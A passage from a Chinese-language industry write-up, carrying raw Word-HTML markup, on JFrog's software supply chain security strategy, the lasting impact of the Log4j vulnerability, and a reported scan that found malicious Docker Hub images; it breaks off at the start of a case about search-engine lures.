normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">3. 明确定位于软件供应链安全和制品管理领域，这是其在市场上的专业方向。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">4. 虽然公司也提供安全扫描服务，但这并非其核心竞争力，市场上已有许多成熟的扫描工具。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">5. 发展路径是从包管理起家，逐步扩展到全面的软件供应链安全服务。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;mso-outline-level: 2;"><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#276296;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">并购安全公司的核心逻辑</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">{</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-fareast-font-family:微软雅黑;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">llm增补</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">}</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"></span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">1. 整合开发和安全:将安全技术整合到制品库平台,为开发和安全团队提供统一的解决方案。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">2. 实现&#34;</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#FA0000;mso-font-kerning:0.0pt;">液体软件</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">&#34;愿景:确保软件能够无缝且安全地从任何来源流向任何设备。</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;"></span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">3. 全面的安全分析:提供上下文扫描、智能修复、嵌入式软件安全等能力。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">4. 减少&#34;噪音&#34;:通过智能推荐,帮助团队专注于最重要的安全问题,减少误报。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">5. 扩展到设备安全:增强在嵌入式软件和设备安全方面的能力。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">6. 零日漏洞检测:自动检测新的漏洞、恶意软件、后门等威胁。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;mso-outline-level: 1;"><span style="font-size:16.0pt;mso-bidi-font-size:16.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#1E4E79;mso-font-kerning:18.0pt;font-weight:bold;mso-bidi-font-weight:bold;">4. </span><span style="font-size:16.0pt;mso-bidi-font-size:16.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#1E4E79;mso-font-kerning:18.0pt;font-weight:bold;mso-bidi-font-weight:bold;">软件供应链安全威胁与典型案例分析</span><span style="font-size:16.0pt;mso-bidi-font-size:16.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#1E4E79;mso-font-kerning:18.0pt;font-weight:bold;mso-bidi-font-weight:bold;"></span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;mso-outline-level: 2;"><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">案例：核弹级</span><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">Apache log4j</span><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">漏洞</span><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;"></span>    <o:page></o:page></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">2021年的Log4j漏洞确实对软件供应链安全产生了深远的影响。这个漏洞的重要性和持续影响主要体现在以下几个方面:</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">1. 广泛性：Log4j是一个被广泛使用的Java日志库，几乎存在于所有Java应用中。这意味着漏洞的影响范围极其广泛。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">2. 严重性：该漏洞允许远程代码执行，被评为最高危险级别(CVSS 10.0)。攻击者可以轻易地利用它来接管系统。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">3. 供应链复杂性：由于Log4j深度嵌入在许多软件和系统中，修复过程变得异常复杂。许多组织甚至不知道他们的系统中哪里使用了Log4j。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">4. 安全意识提升：这个事件大大提高了人们对软件供应链安全的认识，促使更多组织开始关注和管理其软件依赖。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">5. 政策影响：各国政府和监管机构开始更加重视软件供应链安全，出台了相关政策和指南。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">至于为什么三年后这个问题仍未完全解决，主要有以下原因：</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">1. 遗留系统：许多老旧系统难以更新或者更新成本很高。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">2. 依赖关系复杂：某些系统可能依赖于使用旧版Log4j的其他组件。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">3. 认知gap：一些组织可能仍然没有意识到他们的系统中存在这个问题。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">4. 资源限制：完全修复需要大量的时间和资源投入。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">5. 新的挑战：随着时间推移，新的漏洞和威胁不断出现，分散了注意力和资源。</span>    <o:page></o:page></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">这个事件凸显了软件供应链安全的重要性和复杂性，也表明我们在这方面还有很长的路要走。要解决这类问题，需要技术、政策和组织文化等多方面的持续努力。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;mso-outline-level: 2;"><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">数据：</span><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">DockerHub</span><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">恶意镜像比例</span><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">30%</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">1. Docker Hub中存在大量恶意镜像：在约1000-1500万个Docker镜像中，发现了约300万个恶意镜像。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">2. Jfrog与Docker Hub合作：Docker Hub开放了镜像库遍历接口，允许Jfrog进行全面扫描。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">3. Jfrog的扫描能力优势：Jfrog的扫描工具能力优于Docker Hub自身的工具。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">4. 安全问题的处理：在公开报告之前，Docker公司已经清除了这300万个恶意镜像。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">5. 用户认知与实际情况的差异：传统观念认为Docker Hub主要存储官方仓库，但实际情况显示存在大量潜在安全风险。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">6. 合作共赢：这次合作既帮助Docker Hub提高了安全性，也让Jfrog获得了宝贵的研究数据。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">这个发现颠覆了开发者对Docker Hub的传统认知，突显了容器镜像安全的重要性，以及行业合作在提高整体安全性方面的价值。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;mso-outline-level: 2;"><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">案例：</span><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">利用搜索引擎欺骗用户下载恶意</span><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">Docker</span>    <o:page></o:page></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"></span><span style="color: rgb(0, 0, 0);font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;text-indent: 0pt;letter-spacing: 0.034em;">1. 